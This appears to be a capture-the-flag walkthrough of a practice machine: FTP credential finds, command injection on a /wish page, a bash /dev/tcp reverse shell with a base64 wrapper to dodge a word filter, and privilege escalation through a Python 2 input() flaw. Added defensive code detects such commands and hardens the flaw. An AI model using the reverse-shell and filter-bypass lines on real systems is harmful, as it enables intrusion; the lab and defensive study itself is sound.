nmap -sC -sV -p- 192.168.253.131
-sC for default scripts, -sV for version enumeration and -p- to scan all ports.
Open Ports
port 21 ftp (anonymous login enabled)
port 1337
port 7331 http
Let's log in to ftp with anonymous:anonymous.
After login, we can see the files creds.txt, game.txt and message.txt.
Let's download these 3 files using the get command.
Reading the files gives us some interesting info:
nitu:81299
oh and I forgot to tell you I’ve setup a game for you on port 1337. See if you can reach to the final level and get the prize.
@nitish81299 I am going on holidays for few days, please take care of all the work. And don’t mess up anything.
Visiting port 7331 reveals a simple http site.
Running gobuster reveals two directories, /wish and /genie.
There is nothing special in the /genie web directory.
At /wish we have an option to enter commands. We don't know yet whether the entered commands are executed.
Let's try by entering ls to list the files in the current directory.
After entering the ls command we are redirected to an error 403 page.
Upon looking closely we can see the files present in the current directory.
For this press ctrl + A; this should select all the text, revealing the command result which was hidden.
Now we know we can enter and execute commands.
With this info, we can execute a reverse shell to get ourselves a shell.
For the reverse shell I will be using bash -i >& /dev/tcp/192.168.253.128/8080 0>&1
This code is available at: https://pentestmonkey.net/tools/web-shells/php-reverse-shell
Make sure to change the ip to your attacker machine ip. And remember the port number, we will need it to set up the netcat listener.
Set up the netcat listener using nc -lnvp 8080
There is a problem: when we enter the above reverse shell, the command is not executed; there is some kind of filter for certain words.
After researching for a while I found we can bypass this filter by encoding the reverse shell in base64 format.
Now use the above command to encode the reverse shell into base64 format and copy the output.
To execute this command, submit
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI1My4xMjgvODA4MCAwPiYxCg== | base64 -d | bash
Submit this code and we should have shell access as www-data.
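The filter on /wish blocked the plain reverse shell but let the base64-wrapped version through, which is exactly what a literal substring blocklist does. Below is an added example (not code from the walkthrough or from the machine) of the check a defender would run over submitted commands instead: it matches the literal indicators, notes decoder chains such as base64 -d, and also decodes any base64-looking token before matching. The word lists and the sample input are constructed for this example; the base64 string is the one from the walkthrough.

```python
import base64
import binascii
import re

# Words a naive blocklist keys on (constructed for this example; the box's
# real filter list is not known from the walkthrough).
BLOCKED_WORDS = ("/dev/tcp/", "bash -i", "nc -e", "python -c")
# Decoder chains that hint the real payload is wrapped in an encoding.
DECODER_CHAINS = ("base64 -d", "base64 --decode", "xxd -r")

# A run of base64 alphabet characters long enough to carry a command.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_tokens(text):
    """Return the decoded text of every base64-looking token in text."""
    decoded = []
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        padded = token + "=" * (-len(token) % 4)  # restore stripped padding
        try:
            raw = base64.b64decode(padded, validate=True)
        except (ValueError, binascii.Error):
            continue  # not valid base64 after all
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def naive_filter_blocks(cmd):
    """Literal substring check: the kind of filter the plain reverse shell
    hit but the base64-wrapped one walked past."""
    low = cmd.lower()
    return any(word in low for word in BLOCKED_WORDS)


def classify(cmd):
    """Return the reasons cmd looks like a reverse-shell attempt, including
    indicators that only appear after decoding embedded base64 tokens."""
    reasons = []
    low = cmd.lower()
    reasons += [f"literal:{w}" for w in BLOCKED_WORDS if w in low]
    reasons += [f"decoder:{d}" for d in DECODER_CHAINS if d in low]
    for text in decode_b64_tokens(cmd):
        inner = text.lower()
        reasons += [f"base64:{w}" for w in BLOCKED_WORDS if w in inner]
    return reasons


def scan(lines):
    """Return [(line, reasons)] for every submitted command that trips classify()."""
    return [(line, classify(line)) for line in lines if classify(line)]


# Constructed sample of commands submitted to the /wish form; the base64
# string is the one used in the walkthrough.
SAMPLE_INPUT = [
    "ls",
    "bash -i >& /dev/tcp/192.168.253.128/8080 0>&1",
    "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI1My4xMjgvODA4MCAwPiYxCg== | base64 -d | bash",
]

if __name__ == "__main__":
    for line in SAMPLE_INPUT:
        print(f"naive_blocks={naive_filter_blocks(line)} reasons={classify(line)}  {line}")
```

Run as a script it prints, for each sample line, whether the naive filter would have blocked it and what the decoding-aware classifier reports; the third line is blocked by neither word list literally but is flagged through the decoder chain and the decoded payload.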
Upgrade your shell using
python -c 'import pty; pty.spawn("/bin/bash")'
There is user.txt, the first flag, inside the home directory of nitish. We don't have permission to read the flag.
Looking into the .dev directory we have a file named creds.txt which contains the credentials of user nitish:
nitish:p4ssw0rdStr3r0n9
Let's switch user to nitish and read user.txt:
10aay8289ptgguy1pvfa73alzusyyx3c
Using the command sudo -l reveals we can run /usr/bin/genie as user sam.
I tried using the arguments displayed to execute a command, but none of the arguments worked, so I was out of ideas.
Then I used the command strings /usr/bin/genie to print the strings of printable characters in the file.
Here we have an interesting argument which we didn't find earlier in the help option: -cmd
Using this argument gives us a shell as user sam.
Then I again ran sudo -l, which revealed I can run /root/lago as user root.
Running the lago file reveals we have to enter a choice. I tried all of them with the aim of getting a root shell or executing a command, but none worked.
Upon further digging we can see a ".pyc" file in Sam's home directory. This looks interesting.
First I used the strings command to examine the contents, but that didn't help.
Then I downloaded this .pyc to my Kali Linux machine to work on it further.
When I used the uncompyle6 tool, I found an interesting function:
# imports implied by the decompiled file (randint and system are used below)
from random import randint
from os import system

def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    # Python 2 input() evaluates the typed text as an expression instead of
    # parsing it as a number, so the comparison below trusts user-controlled code
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'
With this we have a root shell and can read the proof.txt file, which completes this machine:
33eur2wjdmq80z47nyy4fx54bnlg3ibc
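The root step above comes from guessit() handing the player's text to Python 2 input(), which evaluates it as an expression rather than parsing a number, and then spawning a shell on a match. As an added example (not the machine's code and not part of the walkthrough), here is the same game written so that the input is only ever parsed as an integer, the number comes from a CSPRNG, and winning returns a boolean instead of spawning a shell; the function names parse_guess, pick_secret and guessit_hardened are this example's own.

```python
import secrets


def parse_guess(raw):
    """Parse the player's text as an integer in 1..100, or return None.
    int() on a string only ever yields a number; nothing the player types
    is evaluated as code, unlike Python 2's input()."""
    try:
        value = int(raw.strip())
    except ValueError:
        return None
    if not 1 <= value <= 100:
        return None
    return value


def pick_secret():
    """Unpredictable number in 1..100. The original used random.randint(1, 101),
    which is not a CSPRNG and also allows 101 despite the prompt."""
    return secrets.randbelow(100) + 1


def guessit_hardened(raw_guess, secret=None):
    """Return True only when the parsed guess equals the secret.
    The privileged action (the original spawned /bin/sh here) is left to the
    caller, so a correct guess is a game result, not a shell."""
    if secret is None:
        secret = pick_secret()
    guess = parse_guess(raw_guess)
    return guess is not None and guess == secret


if __name__ == "__main__":
    number = pick_secret()
    print("Choose a number between 1 to 100: ")
    if guessit_hardened(input("Enter your number: "), number):
        print("Correct")
    else:
        print("Better Luck next time")
```

The key difference is that arithmetic or names typed at the prompt ("41+1", "abc") are rejected by parse_guess rather than evaluated, so the only way to satisfy the comparison is to actually match the number.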
For any correction / query / suggestion contact on
Instagram dollarboysushil
Twitter (X) dollarboysushil
Youtube dollarboysushil